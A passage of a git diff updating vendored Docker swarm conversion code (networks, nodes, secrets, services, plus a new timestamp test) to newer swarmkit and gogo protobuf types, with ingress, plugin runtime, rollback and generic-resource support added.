 				IPAMOptions: ipamFromGRPC(n.Spec.IPAM),
+				Scope:       netconst.SwarmScope,
 			},
 			IPAMOptions: ipamFromGRPC(n.IPAM),
 		}
 
+		if n.Spec.GetNetwork() != "" {
+			network.Spec.ConfigFrom = &networktypes.ConfigReference{
+				Network: n.Spec.GetNetwork(),
+			}
+		}
+
 		// Meta
 		network.Version.Index = n.Meta.Version.Index
-		network.CreatedAt, _ = ptypes.Timestamp(n.Meta.CreatedAt)
-		network.UpdatedAt, _ = ptypes.Timestamp(n.Meta.UpdatedAt)
+		network.CreatedAt, _ = gogotypes.TimestampFromProto(n.Meta.CreatedAt)
+		network.UpdatedAt, _ = gogotypes.TimestampFromProto(n.Meta.UpdatedAt)
 
 		//Annotations
-		network.Spec.Name = n.Spec.Annotations.Name
-		network.Spec.Labels = n.Spec.Annotations.Labels
+		network.Spec.Annotations = annotationsFromGRPC(n.Spec.Annotations)
 
 		//DriverConfiguration
 		if n.Spec.DriverConfig != nil {
@@ -90,13 +98,7 @@ func endpointSpecFromGRPC(es *swarmapi.EndpointSpec) *types.EndpointSpec {
 		endpointSpec.Mode = types.ResolutionMode(strings.ToLower(es.Mode.String()))
 
 		for _, portState := range es.Ports {
-			endpointSpec.Ports = append(endpointSpec.Ports, types.PortConfig{
-				Name:          portState.Name,
-				Protocol:      types.PortConfigProtocol(strings.ToLower(swarmapi.PortConfig_Protocol_name[int32(portState.Protocol)])),
-				PublishMode:   types.PortConfigPublishMode(strings.ToLower(swarmapi.PortConfig_PublishMode_name[int32(portState.PublishMode)])),
-				TargetPort:    portState.TargetPort,
-				PublishedPort: portState.PublishedPort,
-			})
+			endpointSpec.Ports = append(endpointSpec.Ports, swarmPortConfigToAPIPortConfig(portState))
 		}
 	}
 	return endpointSpec
@@ -110,13 +112,7 @@ func endpointFromGRPC(e *swarmapi.Endpoint) types.Endpoint {
 		}
 
 		for _, portState := range e.Ports {
-			endpoint.Ports = append(endpoint.Ports, types.PortConfig{
-				Name:          portState.Name,
-				Protocol:      types.PortConfigProtocol(strings.ToLower(swarmapi.PortConfig_Protocol_name[int32(portState.Protocol)])),
-				PublishMode:   types.PortConfigPublishMode(strings.ToLower(swarmapi.PortConfig_PublishMode_name[int32(portState.PublishMode)])),
-				TargetPort:    portState.TargetPort,
-				PublishedPort: portState.PublishedPort,
-			})
+			endpoint.Ports = append(endpoint.Ports, swarmPortConfigToAPIPortConfig(portState))
 		}
 
 		for _, v := range e.VirtualIPs {
@@ -130,17 +126,27 @@ func endpointFromGRPC(e *swarmapi.Endpoint) types.Endpoint {
 	return endpoint
 }
 
+func swarmPortConfigToAPIPortConfig(portConfig *swarmapi.PortConfig) types.PortConfig {
+	return types.PortConfig{
+		Name:          portConfig.Name,
+		Protocol:      types.PortConfigProtocol(strings.ToLower(swarmapi.PortConfig_Protocol_name[int32(portConfig.Protocol)])),
+		PublishMode:   types.PortConfigPublishMode(strings.ToLower(swarmapi.PortConfig_PublishMode_name[int32(portConfig.PublishMode)])),
+		TargetPort:    portConfig.TargetPort,
+		PublishedPort: portConfig.PublishedPort,
+	}
+}
+
 // BasicNetworkFromGRPC converts a grpc Network to a NetworkResource.
 func BasicNetworkFromGRPC(n swarmapi.Network) basictypes.NetworkResource {
 	spec := n.Spec
 	var ipam networktypes.IPAM
-	if spec.IPAM != nil {
-		if spec.IPAM.Driver != nil {
-			ipam.Driver = spec.IPAM.Driver.Name
-			ipam.Options = spec.IPAM.Driver.Options
+	if n.IPAM != nil {
+		if n.IPAM.Driver != nil {
+			ipam.Driver = n.IPAM.Driver.Name
+			ipam.Options = n.IPAM.Driver.Options
 		}
-		ipam.Config = make([]networktypes.IPAMConfig, 0, len(spec.IPAM.Configs))
-		for _, ic := range spec.IPAM.Configs {
+		ipam.Config = make([]networktypes.IPAMConfig, 0, len(n.IPAM.Configs))
+		for _, ic := range n.IPAM.Configs {
 			ipamConfig := networktypes.IPAMConfig{
 				Subnet:     ic.Subnet,
 				IPRange:    ic.Range,
@@ -154,13 +160,21 @@ func BasicNetworkFromGRPC(n swarmapi.Network) basictypes.NetworkResource {
 	nr := basictypes.NetworkResource{
 		ID:         n.ID,
 		Name:       n.Spec.Annotations.Name,
-		Scope:      "swarm",
+		Scope:      netconst.SwarmScope,
 		EnableIPv6: spec.Ipv6Enabled,
 		IPAM:       ipam,
 		Internal:   spec.Internal,
 		Attachable: spec.Attachable,
+		Ingress:    IsIngressNetwork(&n),
 		Labels:     n.Spec.Annotations.Labels,
 	}
+	nr.Created, _ = gogotypes.TimestampFromProto(n.Meta.CreatedAt)
+
+	if n.Spec.GetNetwork() != "" {
+		nr.ConfigFrom = networktypes.ConfigReference{
+			Network: n.Spec.GetNetwork(),
+		}
+	}
 
 	if n.DriverState != nil {
 		nr.Driver = n.DriverState.Name
@@ -184,6 +198,7 @@ func BasicNetworkCreateToGRPC(create basictypes.NetworkCreateRequest) swarmapi.N
 		Ipv6Enabled: create.EnableIPv6,
 		Internal:    create.Internal,
 		Attachable:  create.Attachable,
+		Ingress:     create.Ingress,
 	}
 	if create.IPAM != nil {
 		driver := create.IPAM.Driver
@@ -206,5 +221,20 @@ func BasicNetworkCreateToGRPC(create basictypes.NetworkCreateRequest) swarmapi.N
 		}
 		ns.IPAM.Configs = ipamSpec
 	}
+	if create.ConfigFrom != nil {
+		ns.ConfigFrom = &swarmapi.NetworkSpec_Network{
+			Network: create.ConfigFrom.Network,
+		}
+	}
 	return ns
 }
+
+// IsIngressNetwork check if the swarm network is an ingress network
+func IsIngressNetwork(n *swarmapi.Network) bool {
+	if n.Spec.Ingress {
+		return true
+	}
+	// Check if legacy defined ingress network
+	_, ok := n.Spec.Annotations.Labels["com.docker.swarm.internal"]
+	return ok && n.Spec.Annotations.Name == "ingress"
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/network_test.go b/vendor/github.com/docker/docker/daemon/cluster/convert/network_test.go
new file mode 100644
index 0000000000..42f70696b7
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/convert/network_test.go
@@ -0,0 +1,34 @@
+package convert // import "github.com/docker/docker/daemon/cluster/convert"
+
+import (
+	"testing"
+	"time"
+
+	swarmapi "github.com/docker/swarmkit/api"
+	gogotypes "github.com/gogo/protobuf/types"
+)
+
+func TestNetworkConvertBasicNetworkFromGRPCCreatedAt(t *testing.T) {
+	expected, err := time.Parse("Jan 2, 2006 at 3:04pm (MST)", "Jan 10, 2018 at 7:54pm (PST)")
+	if err != nil {
+		t.Fatal(err)
+	}
+	createdAt, err := gogotypes.TimestampProto(expected)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	nw := swarmapi.Network{
+		Meta: swarmapi.Meta{
+			Version: swarmapi.Version{
+				Index: 1,
+			},
+			CreatedAt: createdAt,
+		},
+	}
+
+	n := BasicNetworkFromGRPC(nw)
+	if !n.Created.Equal(expected) {
+		t.Fatalf("expected time %s; received %s", expected, n.Created)
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/node.go b/vendor/github.com/docker/docker/daemon/cluster/convert/node.go
index 306f34e0b2..00636b6ab4 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/convert/node.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/convert/node.go
@@ -1,4 +1,4 @@
-package convert
+package convert // import "github.com/docker/docker/daemon/cluster/convert"
 
 import (
 	"fmt"
@@ -6,7 +6,7 @@ import (
 
 	types "github.com/docker/docker/api/types/swarm"
 	swarmapi "github.com/docker/swarmkit/api"
-	"github.com/docker/swarmkit/protobuf/ptypes"
+	gogotypes "github.com/gogo/protobuf/types"
 )
 
 // NodeFromGRPC converts a grpc Node to a Node.
@@ -14,7 +14,7 @@ func NodeFromGRPC(n swarmapi.Node) types.Node {
 	node := types.Node{
 		ID: n.ID,
 		Spec: types.NodeSpec{
-			Role:         types.NodeRole(strings.ToLower(n.Spec.Role.String())),
+			Role:         types.NodeRole(strings.ToLower(n.Spec.DesiredRole.String())),
 			Availability: types.NodeAvailability(strings.ToLower(n.Spec.Availability.String())),
 		},
 		Status: types.NodeStatus{
@@ -26,12 +26,11 @@ func NodeFromGRPC(n swarmapi.Node) types.Node {
 
 	// Meta
 	node.Version.Index = n.Meta.Version.Index
-	node.CreatedAt, _ = ptypes.Timestamp(n.Meta.CreatedAt)
-	node.UpdatedAt, _ = ptypes.Timestamp(n.Meta.UpdatedAt)
+	node.CreatedAt, _ = gogotypes.TimestampFromProto(n.Meta.CreatedAt)
+	node.UpdatedAt, _ = gogotypes.TimestampFromProto(n.Meta.UpdatedAt)
 
 	//Annotations
-	node.Spec.Name = n.Spec.Annotations.Name
-	node.Spec.Labels = n.Spec.Annotations.Labels
+	node.Spec.Annotations = annotationsFromGRPC(n.Spec.Annotations)
 
 	//Description
 	if n.Description != nil {
@@ -43,6 +42,7 @@ func NodeFromGRPC(n swarmapi.Node) types.Node {
 		if n.Description.Resources != nil {
 			node.Description.Resources.NanoCPUs = n.Description.Resources.NanoCPUs
 			node.Description.Resources.MemoryBytes = n.Description.Resources.MemoryBytes
+			node.Description.Resources.GenericResources = GenericResourcesFromGRPC(n.Description.Resources.Generic)
 		}
 		if n.Description.Engine != nil {
 			node.Description.Engine.EngineVersion = n.Description.Engine.EngineVersion
@@ -51,6 +51,11 @@ func NodeFromGRPC(n swarmapi.Node) types.Node {
 				node.Description.Engine.Plugins = append(node.Description.Engine.Plugins, types.PluginDescription{Type: plugin.Type, Name: plugin.Name})
 			}
 		}
+		if n.Description.TLSInfo != nil {
+			node.Description.TLSInfo.TrustRoot = string(n.Description.TLSInfo.TrustRoot)
+			node.Description.TLSInfo.CertIssuerPublicKey = n.Description.TLSInfo.CertIssuerPublicKey
+			node.Description.TLSInfo.CertIssuerSubject = n.Description.TLSInfo.CertIssuerSubject
+		}
 	}
 
 	//Manager
@@ -74,7 +79,7 @@ func NodeSpecToGRPC(s types.NodeSpec) (swarmapi.NodeSpec, error) {
 		},
 	}
 	if role, ok := swarmapi.NodeRole_value[strings.ToUpper(string(s.Role))]; ok {
-		spec.Role = swarmapi.NodeRole(role)
+		spec.DesiredRole = swarmapi.NodeRole(role)
 	} else {
 		return swarmapi.NodeSpec{}, fmt.Errorf("invalid Role: %q", s.Role)
 	}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/secret.go b/vendor/github.com/docker/docker/daemon/cluster/convert/secret.go
index 3e966873f4..d0e5ac45d2 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/convert/secret.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/convert/secret.go
@@ -1,9 +1,10 @@
-package convert
+package convert // import "github.com/docker/docker/daemon/cluster/convert"
 
 import (
 	swarmtypes "github.com/docker/docker/api/types/swarm"
+	types "github.com/docker/docker/api/types/swarm"
 	swarmapi "github.com/docker/swarmkit/api"
-	"github.com/docker/swarmkit/protobuf/ptypes"
+	gogotypes "github.com/gogo/protobuf/types"
 )
 
 // SecretFromGRPC converts a grpc Secret to a Secret.
@@ -11,31 +12,46 @@ func SecretFromGRPC(s *swarmapi.Secret) swarmtypes.Secret {
 	secret := swarmtypes.Secret{
 		ID: s.ID,
 		Spec: swarmtypes.SecretSpec{
-			Annotations: swarmtypes.Annotations{
-				Name:   s.Spec.Annotations.Name,
-				Labels: s.Spec.Annotations.Labels,
-			},
-			Data: s.Spec.Data,
+			Annotations: annotationsFromGRPC(s.Spec.Annotations),
+			Data:        s.Spec.Data,
+			Driver:      driverFromGRPC(s.Spec.Driver),
 		},
 	}
 
 	secret.Version.Index = s.Meta.Version.Index
 	// Meta
-	secret.CreatedAt, _ = ptypes.Timestamp(s.Meta.CreatedAt)
-	secret.UpdatedAt, _ = ptypes.Timestamp(s.Meta.UpdatedAt)
+	secret.CreatedAt, _ = gogotypes.TimestampFromProto(s.Meta.CreatedAt)
+	secret.UpdatedAt, _ = gogotypes.TimestampFromProto(s.Meta.UpdatedAt)
+
+	if s.Spec.Templating != nil {
+		secret.Spec.Templating = &types.Driver{
+			Name:    s.Spec.Templating.Name,
+			Options: s.Spec.Templating.Options,
+		}
+	}
 
 	return secret
 }
 
 // SecretSpecToGRPC converts Secret to a grpc Secret.
 func SecretSpecToGRPC(s swarmtypes.SecretSpec) swarmapi.SecretSpec {
-	return swarmapi.SecretSpec{
+	spec := swarmapi.SecretSpec{
 		Annotations: swarmapi.Annotations{
 			Name:   s.Name,
 			Labels: s.Labels,
 		},
-		Data: s.Data,
+		Data:   s.Data,
+		Driver: driverToGRPC(s.Driver),
 	}
+
+	if s.Templating != nil {
+		spec.Templating = &swarmapi.Driver{
+			Name:    s.Templating.Name,
+			Options: s.Templating.Options,
+		}
+	}
+
+	return spec
 }
 
 // SecretReferencesFromGRPC converts a slice of grpc SecretReference to SecretReference
diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/service.go b/vendor/github.com/docker/docker/daemon/cluster/convert/service.go
index aa68e01f44..5a1609aa01 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/convert/service.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/convert/service.go
@@ -1,33 +1,52 @@
-package convert
+package convert // import "github.com/docker/docker/daemon/cluster/convert"
 
 import (
 	"fmt"
 	"strings"
 
 	types "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/api/types/swarm/runtime"
 	"github.com/docker/docker/pkg/namesgenerator"
 	swarmapi "github.com/docker/swarmkit/api"
-	"github.com/docker/swarmkit/protobuf/ptypes"
+	"github.com/docker/swarmkit/api/genericresource"
+	"github.com/gogo/protobuf/proto"
+	gogotypes "github.com/gogo/protobuf/types"
+	"github.com/pkg/errors"
+)
+
+var (
+	// ErrUnsupportedRuntime returns an error if the runtime is not supported by the daemon
+	ErrUnsupportedRuntime = errors.New("unsupported runtime")
+	// ErrMismatchedRuntime returns an error if the runtime does not match the provided spec
+	ErrMismatchedRuntime = errors.New("mismatched Runtime and *Spec fields")
 )
 
 // ServiceFromGRPC converts a grpc Service to a Service.
-func ServiceFromGRPC(s swarmapi.Service) types.Service {
+func ServiceFromGRPC(s swarmapi.Service) (types.Service, error) {
+	curSpec, err := serviceSpecFromGRPC(&s.Spec)
+	if err != nil {
+		return types.Service{}, err
+	}
+	prevSpec, err := serviceSpecFromGRPC(s.PreviousSpec)
+	if err != nil {
+		return types.Service{}, err
+	}
 	service := types.Service{
 		ID:           s.ID,
-		Spec:         *serviceSpecFromGRPC(&s.Spec),
-		PreviousSpec: serviceSpecFromGRPC(s.PreviousSpec),
+		Spec:         *curSpec,
+		PreviousSpec: prevSpec,
 
 		Endpoint: endpointFromGRPC(s.Endpoint),
 	}
 
 	// Meta
 	service.Version.Index = s.Meta.Version.Index
-	service.CreatedAt, _ = ptypes.Timestamp(s.Meta.CreatedAt)
-	service.UpdatedAt, _ = ptypes.Timestamp(s.Meta.UpdatedAt)
+	service.CreatedAt, _ = gogotypes.TimestampFromProto(s.Meta.CreatedAt)
+	service.UpdatedAt, _ = gogotypes.TimestampFromProto(s.Meta.UpdatedAt)
 
 	// UpdateStatus
-	service.UpdateStatus = types.UpdateStatus{}
 	if s.UpdateStatus != nil {
+		service.UpdateStatus = &types.UpdateStatus{}
 		switch s.UpdateStatus.State {
 		case swarmapi.UpdateStatus_UPDATING:
 			service.UpdateStatus.State = types.UpdateStateUpdating
@@ -35,71 +54,74 @@ func ServiceFromGRPC(s swarmapi.Service) types.Service {
 			service.UpdateStatus.State = types.UpdateStatePaused
 		case swarmapi.UpdateStatus_COMPLETED:
 			service.UpdateStatus.State = types.UpdateStateCompleted
+		case swarmapi.UpdateStatus_ROLLBACK_STARTED:
+			service.UpdateStatus.State = types.UpdateStateRollbackStarted
+		case swarmapi.UpdateStatus_ROLLBACK_PAUSED:
+			service.UpdateStatus.State = types.UpdateStateRollbackPaused
+		case swarmapi.UpdateStatus_ROLLBACK_COMPLETED:
+			service.UpdateStatus.State = types.UpdateStateRollbackCompleted
+		}
+
+		startedAt, _ := gogotypes.TimestampFromProto(s.UpdateStatus.StartedAt)
+		if !startedAt.IsZero() && startedAt.Unix() != 0 {
+			service.UpdateStatus.StartedAt = &startedAt
+		}
+
+		completedAt, _ := gogotypes.TimestampFromProto(s.UpdateStatus.CompletedAt)
+		if !completedAt.IsZero() && completedAt.Unix() != 0 {
+			service.UpdateStatus.CompletedAt = &completedAt
 		}
 
-		service.UpdateStatus.StartedAt, _ = ptypes.Timestamp(s.UpdateStatus.StartedAt)
-		service.UpdateStatus.CompletedAt, _ = ptypes.Timestamp(s.UpdateStatus.CompletedAt)
 		service.UpdateStatus.Message = s.UpdateStatus.Message
 	}
 
-	return service
+	return service, nil
 }
 
-func serviceSpecFromGRPC(spec *swarmapi.ServiceSpec) *types.ServiceSpec {
+func serviceSpecFromGRPC(spec *swarmapi.ServiceSpec) (*types.ServiceSpec, error) {
 	if spec == nil {
-		return nil
+		return nil, nil
 	}
 
 	serviceNetworks := make([]types.NetworkAttachmentConfig, 0, len(spec.Networks))
 	for _, n := range spec.Networks {
-		serviceNetworks = append(serviceNetworks, types.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases})
+		netConfig := types.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases, DriverOpts: n.DriverAttachmentOpts}
+		serviceNetworks = append(serviceNetworks, netConfig)
+
 	}
 
-	taskNetworks := make([]types.NetworkAttachmentConfig, 0, len(spec.Task.Networks))
-	for _, n := range spec.Task.Networks {
-		taskNetworks = append(taskNetworks, types.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases})
+	taskTemplate, err := taskSpecFromGRPC(spec.Task)
+	if err != nil {
+		return nil, err
 	}
 
-	containerConfig := spec.Task.Runtime.(*swarmapi.TaskSpec_Container).Container
-	convertedSpec := &types.ServiceSpec{
-		Annotations: types.Annotations{
-			Name:   spec.Annotations.Name,
-			Labels: spec.Annotations.Labels,
-		},
+	switch t := spec.Task.GetRuntime().(type) {
+	case *swarmapi.TaskSpec_Container:
+		containerConfig := t.Container
+		taskTemplate.ContainerSpec = containerSpecFromGRPC(containerConfig)
+		taskTemplate.Runtime = types.RuntimeContainer
+	case *swarmapi.TaskSpec_Generic:
+		switch t.Generic.Kind {
+		case string(types.RuntimePlugin):
+			taskTemplate.Runtime = types.RuntimePlugin
+		default:
+			return nil, fmt.Errorf("unknown task runtime type: %s", t.Generic.Payload.TypeUrl)
+		}
 
-		TaskTemplate: types.TaskSpec{
-			ContainerSpec: containerSpecFromGRPC(containerConfig),
-			Resources:     resourcesFromGRPC(spec.Task.Resources),
-			RestartPolicy: restartPolicyFromGRPC(spec.Task.Restart),
-			Placement:     placementFromGRPC(spec.Task.Placement),
-			LogDriver:     driverFromGRPC(spec.Task.LogDriver),
-			Networks:      taskNetworks,
-			ForceUpdate:   spec.Task.ForceUpdate,
-		},
+	default:
+		return nil, fmt.Errorf("error creating service; unsupported runtime %T", t)
+	}
 
+	convertedSpec := &types.ServiceSpec{
+		Annotations:  annotationsFromGRPC(spec.Annotations),
+		TaskTemplate: taskTemplate,
 		Networks:     serviceNetworks,
 		EndpointSpec: endpointSpecFromGRPC(spec.Endpoint),
 	}
 
 	// UpdateConfig
-	if spec.Update != nil {
-		convertedSpec.UpdateConfig = &types.UpdateConfig{
-			Parallelism:     spec.Update.Parallelism,
-			MaxFailureRatio: spec.Update.MaxFailureRatio,
-		}
-
-		convertedSpec.UpdateConfig.Delay, _ = ptypes.Duration(&spec.Update.Delay)
-		if spec.Update.Monitor != nil {
-			convertedSpec.UpdateConfig.Monitor, _ = ptypes.Duration(spec.Update.Monitor)
-		}
-
-		switch spec.Update.FailureAction {
-		case swarmapi.UpdateConfig_PAUSE:
-			convertedSpec.UpdateConfig.FailureAction = types.UpdateFailureActionPause
-		case swarmapi.UpdateConfig_CONTINUE:
-			convertedSpec.UpdateConfig.FailureAction = types.UpdateFailureActionContinue
-		}
-	}
+	convertedSpec.UpdateConfig = updateConfigFromGRPC(spec.Update)
+	convertedSpec.RollbackConfig = updateConfigFromGRPC(spec.Rollback)
 
 	// Mode
 	switch t := spec.GetMode().(type) {
@@ -111,7 +133,7 @@ func serviceSpecFromGRPC(spec *swarmapi.ServiceSpec) *types.ServiceSpec {
 		}
 	}
 
-	return convertedSpec
+	return convertedSpec, nil
 }
 
 // ServiceSpecToGRPC converts a ServiceSpec to a grpc ServiceSpec.
@@ -123,12 +145,15 @@ func ServiceSpecToGRPC(s types.ServiceSpec) (swarmapi.ServiceSpec, error) {
 
 	serviceNetworks := make([]*swarmapi.NetworkAttachmentConfig, 0, len(s.Networks))
 	for _, n := range s.Networks {
-		serviceNetworks = append(serviceNetworks, &swarmapi.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases})
+		netConfig := &swarmapi.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases, DriverAttachmentOpts: n.DriverOpts}
+		serviceNetworks = append(serviceNetworks, netConfig)
 	}
 
 	taskNetworks := make([]*swarmapi.NetworkAttachmentConfig, 0, len(s.TaskTemplate.Networks))
 	for _, n := range s.TaskTemplate.Networks {
-		taskNetworks = append(taskNetworks, &swarmapi.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases})
+		netConfig := &swarmapi.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases, DriverAttachmentOpts: n.DriverOpts}
+		taskNetworks = append(taskNetworks, netConfig)
+
 	}
 
 	spec := swarmapi.ServiceSpec{
@@ -145,11 +170,52 @@ func ServiceSpecToGRPC(s types.ServiceSpec) (swarmapi.ServiceSpec, error) {
 		Networks: serviceNetworks,
 	}
 
-	containerSpec, err := containerToGRPC(s.TaskTemplate.ContainerSpec)
-	if err != nil {
-		return swarmapi.ServiceSpec{}, err
+	switch s.TaskTemplate.Runtime {
+	case types.RuntimeContainer, "": // if empty runtime default to container
+		if s.TaskTemplate.ContainerSpec != nil {
+			containerSpec, err := containerToGRPC(s.TaskTemplate.ContainerSpec)
+			if err != nil {
+				return swarmapi.ServiceSpec{}, err
+			}
+			spec.Task.Runtime = &swarmapi.TaskSpec_Container{Container: containerSpec}
+		} else {
+			// If the ContainerSpec is nil, we can't set the task runtime
+			return swarmapi.ServiceSpec{}, ErrMismatchedRuntime
+		}
+	case types.RuntimePlugin:
+		if s.TaskTemplate.PluginSpec != nil {
+			if s.Mode.Replicated != nil {
+				return swarmapi.ServiceSpec{}, errors.New("plugins must not use replicated mode")
+			}
+
+			s.Mode.Global = &types.GlobalService{} // must always be global
+
+			pluginSpec, err := proto.Marshal(s.TaskTemplate.PluginSpec)
+			if err != nil {
+				return swarmapi.ServiceSpec{}, err
+			}
+			spec.Task.Runtime = &swarmapi.TaskSpec_Generic{
+				Generic: &swarmapi.GenericRuntimeSpec{
+					Kind: string(types.RuntimePlugin),
+					Payload: &gogotypes.Any{
+						TypeUrl: string(types.RuntimeURLPlugin),
+						Value:   pluginSpec,
+					},
+				},
+			}
+		} else {
+			return swarmapi.ServiceSpec{}, ErrMismatchedRuntime
+		}
+	case types.RuntimeNetworkAttachment:
+		// NOTE(dperny) I'm leaving this case here for completeness. The actual
+		// code is left out out deliberately, as we should refuse to parse a
+		// Network Attachment runtime; it will cause weird behavior all over
+		// the system if we do. Instead, fallthrough and return
+		// ErrUnsupportedRuntime if we get one.
+		fallthrough
+	default:
+		return swarmapi.ServiceSpec{}, ErrUnsupportedRuntime
 	}
-	spec.Task.Runtime = &swarmapi.TaskSpec_Container{Container: containerSpec}
 
 	restartPolicy, err := restartPolicyToGRPC(s.TaskTemplate.RestartPolicy)
 	if err != nil {
@@ -158,30 +224,39 @@ func ServiceSpecToGRPC(s types.ServiceSpec) (swarmapi.ServiceSpec, error) {
 	spec.Task.Restart = restartPolicy
 
 	if s.TaskTemplate.Placement != nil {
+		var preferences []*swarmapi.PlacementPreference
+		for _, pref := range s.TaskTemplate.Placement.Preferences {
+			if pref.Spread != nil {
+				preferences = append(preferences, &swarmapi.PlacementPreference{
+					Preference: &swarmapi.PlacementPreference_Spread{
+						Spread: &swarmapi.SpreadOver{
+							SpreadDescriptor: pref.Spread.SpreadDescriptor,
+						},
+					},
+				})
+			}
+		}
+		var platforms []*swarmapi.Platform
+		for _, plat := range s.TaskTemplate.Placement.Platforms {
+			platforms = append(platforms, &swarmapi.Platform{
+				Architecture: plat.Architecture,
+				OS:           plat.OS,
+			})
+		}
 		spec.Task.Placement = &swarmapi.Placement{
 			Constraints: s.TaskTemplate.Placement.Constraints,
+			Preferences: preferences,
+			Platforms:   platforms,
 		}
 	}
 
-	if s.UpdateConfig != nil {
-		var failureAction swarmapi.UpdateConfig_FailureAction
-		switch s.UpdateConfig.FailureAction {
-		case types.UpdateFailureActionPause, "":
-			failureAction = swarmapi.UpdateConfig_PAUSE
-		case types.UpdateFailureActionContinue:
-			failureAction = swarmapi.UpdateConfig_CONTINUE
-		default:
-			return swarmapi.ServiceSpec{}, fmt.Errorf("unrecongized update failure action %s", s.UpdateConfig.FailureAction)
-		}
-		spec.Update = &swarmapi.UpdateConfig{
-			Parallelism:     s.UpdateConfig.Parallelism,
-			Delay:           *ptypes.DurationProto(s.UpdateConfig.Delay),
-			FailureAction:   failureAction,
-			MaxFailureRatio: s.UpdateConfig.MaxFailureRatio,
-		}
-		if s.UpdateConfig.Monitor != 0 {
-			spec.Update.Monitor = ptypes.DurationProto(s.UpdateConfig.Monitor)
-		}
+	spec.Update, err = updateConfigToGRPC(s.UpdateConfig)
+	if err != nil {
+		return swarmapi.ServiceSpec{}, err
+	}
+	spec.Rollback, err = updateConfigToGRPC(s.RollbackConfig)
+	if err != nil {
+		return swarmapi.ServiceSpec{}, err
 	}
 
 	if s.EndpointSpec != nil {
@@ -228,6 +303,44 @@ func ServiceSpecToGRPC(s types.ServiceSpec) (swarmapi.ServiceSpec, error) {
 	return spec, nil
 }
 
+func annotationsFromGRPC(ann swarmapi.Annotations) types.Annotations {
+	a := types.Annotations{
+		Name:   ann.Name,
+		Labels: ann.Labels,
+	}
+
+	if a.Labels == nil {
+		a.Labels = make(map[string]string)
+	}
+
+	return a
+}
+
+// GenericResourcesFromGRPC converts a GRPC GenericResource to a GenericResource
+func GenericResourcesFromGRPC(genericRes []*swarmapi.GenericResource) []types.GenericResource {
+	var generic []types.GenericResource
+	for _, res := range genericRes {
+		var current types.GenericResource
+
+		switch r := res.Resource.(type) {
+		case *swarmapi.GenericResource_DiscreteResourceSpec:
+			current.DiscreteResourceSpec = &types.DiscreteGenericResource{
+				Kind:  r.DiscreteResourceSpec.Kind,
+				Value: r.DiscreteResourceSpec.Value,
+			}
+		case *swarmapi.GenericResource_NamedResourceSpec:
+			current.NamedResourceSpec = &types.NamedGenericResource{
+				Kind:  r.NamedResourceSpec.Kind,
+				Value: r.NamedResourceSpec.Value,
+			}
+		}
+
+		generic = append(generic, current)
+	}
+
+	return generic
+}
+
 func resourcesFromGRPC(res *swarmapi.ResourceRequirements) *types.ResourceRequirements {
 	var resources *types.ResourceRequirements
 	if res != nil {
@@ -240,8 +353,9 @@ func resourcesFromGRPC(res *swarmapi.ResourceRequirements) *types.ResourceRequir
 		}
 		if res.Reservations != nil {
 			resources.Reservations = &types.Resources{
-				NanoCPUs:    res.Reservations.NanoCPUs,
-				MemoryBytes: res.Reservations.MemoryBytes,
+				NanoCPUs:         res.Reservations.NanoCPUs,
+				MemoryBytes:      res.Reservations.MemoryBytes,
+				GenericResources: GenericResourcesFromGRPC(res.Reservations.Generic),
 			}
 		}
 	}
@@ -249,6 +363,24 @@ func resourcesFromGRPC(res *swarmapi.ResourceRequirements) *types.ResourceRequir
 	return resources
 }
 
+// GenericResourcesToGRPC converts a GenericResource to a GRPC GenericResource
+func GenericResourcesToGRPC(genericRes []types.GenericResource) []*swarmapi.GenericResource {
+	var generic []*swarmapi.GenericResource
+	for _, res := range genericRes {
+		var r *swarmapi.GenericResource
+
+		if res.DiscreteResourceSpec != nil {
+			r = genericresource.NewDiscrete(res.DiscreteResourceSpec.Kind, res.DiscreteResourceSpec.Value)
+		} else if res.NamedResourceSpec != nil {
+			r = genericresource.NewString(res.NamedResourceSpec.Kind, res.NamedResourceSpec.Value)
+		}
+
+		generic = append(generic, r)
+	}
+
+	return generic
+}
+
 func resourcesToGRPC(res *types.ResourceRequirements) *swarmapi.ResourceRequirements {
 	var reqs *swarmapi.ResourceRequirements
 	if res != nil {
@@ -263,6 +395,7 @@ func resourcesToGRPC(res *types.ResourceRequirements) *swarmapi.ResourceRequirem
 			reqs.Reservations = &swarmapi.Resources{
 				NanoCPUs:    res.Reservations.NanoCPUs,
 				MemoryBytes: res.Reservations.MemoryBytes,
+				Generic:     GenericResourcesToGRPC(res.Reservations.GenericResources),
 			}
 
 		}
@@ -287,11 +420,11 @@ func restartPolicyFromGRPC(p *swarmapi.RestartPolicy) *types.RestartPolicy {
 		}
 
 		if p.Delay != nil {
-			delay, _ := ptypes.Duration(p.Delay)
+			delay, _ := gogotypes.DurationFromProto(p.Delay)
 			rp.Delay = &delay
 		}
 		if p.Window != nil {
-			window, _ := ptypes.Duration(p.Window)
+			window, _ := gogotypes.DurationFromProto(p.Window)
 			rp.Window = &window
 		}
 
@@ -320,10 +453,10 @@ func restartPolicyToGRPC(p *types.RestartPolicy) (*swarmapi.RestartPolicy, error
 		}
 
 		if p.Delay != nil {
-			rp.Delay = ptypes.DurationProto(*p.Delay)
+			rp.Delay = gogotypes.DurationProto(*p.Delay)
 		}
 		if p.Window != nil {
-			rp.Window = ptypes.DurationProto(*p.Window)
+			rp.Window = gogotypes.DurationProto(*p.Window)
 		}
 		if p.MaxAttempts != nil {
 			rp.MaxAttempts = *p.MaxAttempts
@@ -334,10 +467,28 @@ func restartPolicyToGRPC(p *types.RestartPolicy) (*swarmapi.RestartPolicy, error
 }
 
